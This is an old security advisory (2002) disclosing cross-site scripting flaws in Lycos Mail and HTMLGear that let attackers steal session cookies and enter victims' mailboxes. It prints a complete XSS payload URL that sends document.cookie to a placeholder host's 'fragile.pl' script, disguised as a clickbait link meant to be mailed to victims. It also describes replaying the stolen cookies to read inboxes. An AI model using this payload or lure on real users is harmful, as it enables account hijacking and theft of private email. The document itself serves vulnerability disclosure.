Lycos Mail and Lycos HTMLGear XSS/Cookie Problems Advisory
6 Nov. 2002
Lycos Mail is a full featured web-based email solution. Lycos Mail now offers two levels of email service, a standard FREE version and a NEW Lycos Mail Plus option for the more demanding user. Professional Gears eliminate ALL ads and HTML Gear branding and give you the freedom to integrate Gears more seamlessly on your site. Both sites (Lycos Mail and HTMLGear) have been found to contain multiple XSS vulnerabilities.
The information has been provided by N|ghtHawk.
Besides those bugs, the HTMLGear got also a XSS in 'control.guest' on the lycos.com server. Both bugs can be used to get the cookies from users of the site. The real problem in this is that through this way people their lycosmail cookies can be captured. This can be done when people use the "Save User Name & Password" option when login in and don't log out. Closing the browser wil not log them out. With the cookie of a lycosmail user, people can have access to their mailbox.
Or let people click on the next URL:
This can be done by letting people click on a link, which you can mail them:
- <a href="http://htmlgear.lycos.com/guest/control.guest?u=poof&a=%22%3E%3Cscript%3Ewindow.open('http://host/cgi-bin/fragile.pl?'%252Bdocument.cookie)%3C/script%3E">Britney Nude!</a>
All will connect with a perl script (fragile.pl), this script will take the cookie, and make a connection to lycos.com to login on the mail server using the cookie. Then it will request the inbox or the front page of the mailbox of the user. With the third option in the exploit it just captures the cookies and writes them in a file together with the email address. This is just a proof of concept you could also change it to let it read mail. Please don't email me with request to write that.